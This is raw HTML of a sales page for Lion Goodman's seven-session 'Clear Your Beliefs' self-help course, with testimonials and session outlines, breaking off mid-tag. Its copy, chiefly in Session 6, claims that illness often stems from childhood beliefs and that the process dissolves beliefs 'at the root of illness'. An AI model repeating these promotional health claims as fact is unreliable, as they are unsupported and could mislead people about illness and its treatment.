wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> </span>When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\r\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\r\n<span style="color: #333399;"><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></span>\r\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\r\n&nbsp;\r\n<h1>Beliefs Reside In The Subconscious Mind</h1>\r\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\r\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\r\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\r\n\r\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\r\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\r\n\r\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\r\n\r\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\r\n\r\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\r\n\r\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\r\n\r\n&nbsp;\r\n<h1>Why Beliefs Are Difficult To Change</h1>\r\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\r\n\r\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\r\n\r\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\r\n\r\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\r\n\r\n&nbsp;\r\n<h1>Why We React The Way We Do</h1>\r\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\r\n\r\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\r\n<ul class="indented-img-left">\r\n	<li>Why did I say that?</li>\r\n	<li>What’s wrong with me?</li>\r\n	<li>Why didn’t I follow through?</li>\r\n	<li>Why did I react that way?</li>\r\n	<li>What the hell just happened?</li>\r\n</ul>\r\n<em>\r\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\r\n\r\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\r\n\r\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\r\n\r\n&nbsp;\r\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\r\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\r\n<ul class="indented">\r\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\r\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\r\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\r\n</ul>\r\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\r\n\r\n&nbsp;\r\n<h1>Here’s Some Good News</h1>\r\n<ul class="indented">\r\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\r\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\r\n</ul>\r\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\r\n\r\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\r\n\r\n&nbsp;\r\n<h1>Imagine The Life You Desire</h1>\r\n<strong>Can you imagine this?</strong>\r\n\r\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\r\n<ul class="indented-img-left">\r\n	<li>You''re no longer held back by old beliefs and stories.</li>\r\n	<li>There''s no resistance to doing what needs to be done.</li>\r\n	<li>You feel joy and positive energy as you move forward to create the life of your dreams.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\r\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\r\n\r\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\r\n\r\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\r\n\r\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\r\n\r\n&nbsp;\r\n<h1>Clear Whatever Is In The Way</h1>\r\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\r\n\r\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\r\n\r\n&nbsp;\r\n<h1>Is This A Guaranteed Cure-All For What Ails You?</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work. No technique will cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. No free rides.\r\n\r\nIn our ten years of experience using this technique with thousands of clients, we''ve seen that nearly every problem has its source at the causal causal level, down where your beliefs are stored. Itt takes significant effort to clear your deepest beliefs – the ones that got programmed before you could speak.\r\n\r\nThat''s why we offer a <strong>Coaching Option</strong> with our program. Our professionally trained <em>Clear Your Beliefs Coaches</em> can guide you on your journey down to the deepest level of your psyche – a place that''s difficult to get to all by yourself.\r\n\r\n&nbsp;\r\n<h1>The Clear Your Beliefs program can:</h1>\r\n<ul class="indented">\r\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\r\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\r\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\r\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, we invite all aspects of you – mental, emotional, physical, and spiritual – to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\r\n\r\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\r\n\r\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\r\n<div class="icon_box">\r\n<h1>With This Methodology, You Can Finally:</h1>\r\n<ul class="check">\r\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="margin-right: -120px ! important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\r\n	<li>Remove resistance and barriers</li>\r\n	<li>Open doors to new opportunities</li>\r\n	<li>Eliminate pain and suffering from the past</li>\r\n	<li>Experience more fulfillment in your relationships</li>\r\n	<li>Attract more abundance and prosperity</li>\r\n	<li>Increase your energy, vitality, and productivity</li>\r\n</ul>\r\n</div>\r\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\r\n<div class="quot">\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\r\n<div style="text-align: right;"><strong>– G. J., software developer</strong></div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n</div>\r\n<div class="message_box">\r\n<h1>A Message from Lion Goodman...</h1>\r\nDear Explorer:\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>As a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\r\n\r\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\r\n\r\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\r\n\r\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\r\n\r\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\r\n\r\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\r\n\r\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\r\n\r\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\r\n\r\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\r\n\r\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\r\n\r\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\r\n\r\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\r\n\r\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. You also have the opportunity to work with a professional <em>Clear Your Beliefs Coach </em>in private sessions. Join me for seven sessions of deep healing and transformation. Clear your old beliefs, and create the life you want.\r\n\r\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\r\n\r\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs... In gratitude, and with warm wishes for your total success,\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\r\n\r\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Register Today and Discover What''s Possible</h1>\r\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful technique used by hundreds of coaches and therapists around the world.\r\n\r\nYou can take yourself through the course, or you can go deeper by working one-on-one with a <em>Clear Your Beliefs Coach, </em>who will guide you and answer your questions each week. Our professionally trained coaches are located in cities around the world, and they can work with you in person, by phone, or via Skype.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 1: </span> <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.In this first session, you’ll examine your old beliefs, and determine which ones no longer serve you. It’s time to discard them and clear some space!You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades. You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 1, you will:</strong>\r\n<ul>\r\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\r\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\r\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\r\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\r\n<div style="text-align: right;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 2: </span> <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.What do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child. What messages did your parents, caregivers, and siblings plant in your child brain that still affect you?In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.It’s time to haul them out, and toss them out! You don’t need them anymore. If you hear critical inner voices berating you, don’t miss this session. Rid yourself of those pesky critical voices along with the diapers!\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 2, you will:</strong>\r\n<ul>\r\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\r\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\r\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\r\n<div style="text-align: right;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div style="text-align: right;"></div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 3: </span> <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\r\n\r\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.<em>What are you capable of? </em> If your answer is “Anything...” you don’t need this session. But most of us think too small...\r\n\r\n</div>\r\n<div class="module_body">Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised. We let our negative beliefs stop us.You may hear internal voices say, <em>“What’s the use? You’ll fail anyway. You don’t deserve happiness. Look at you!” </em>We were shamed into thinking that we were less than others. We learned to compare ourselves to others – and we always lose that contest. Clear out any apparent limitations you''ve taken on, and find your true power to create what you want. Do whatever you need to do in order to achieve your vision.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 3, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\r\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\r\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\r\n<div style="text-align: right;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 4: </span> <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.If you’re married, are you happy and secure? Or are you anxious about the future? If you’re not in a relationship, what’s holding you back from finding your ideal mate?Humans are social creatures – we must relate to others to survive. At our core, we want a security and safety, but we also want passion and romance. You learned “what love is” from your parents – so it’s no wonder that you’re confused! Most of us repeat patterns we learned from our early childhood. We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like. Love was contaminated by disdain, contempt, withdrawal, or abuse. We were programmed to repeat their patterns – without conscious choice. This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\r\n\r\n</div>\r\n&nbsp;\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 4, you will:</strong>\r\n<ul>\r\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\r\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\r\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\r\n<div style="text-align: right;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 5: </span> <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\r\n\r\nWhat do you believe about earning a living in today’s economy? Is money really the root of all evil?\r\n\r\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem. Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture. Can you see their influence?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 5, you will:</strong>\r\n<ul>\r\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\r\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\r\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\r\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\r\n<div style="text-align: right;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 6: </span> <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.What do you believe and perceive about your body? Your health? Your age? Your vitality? Your ability to heal? The future of your health?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 6, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and vibrant health</li>\r\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\r\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\r\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\r\n<div style="text-align: right;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 7: </span> <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a 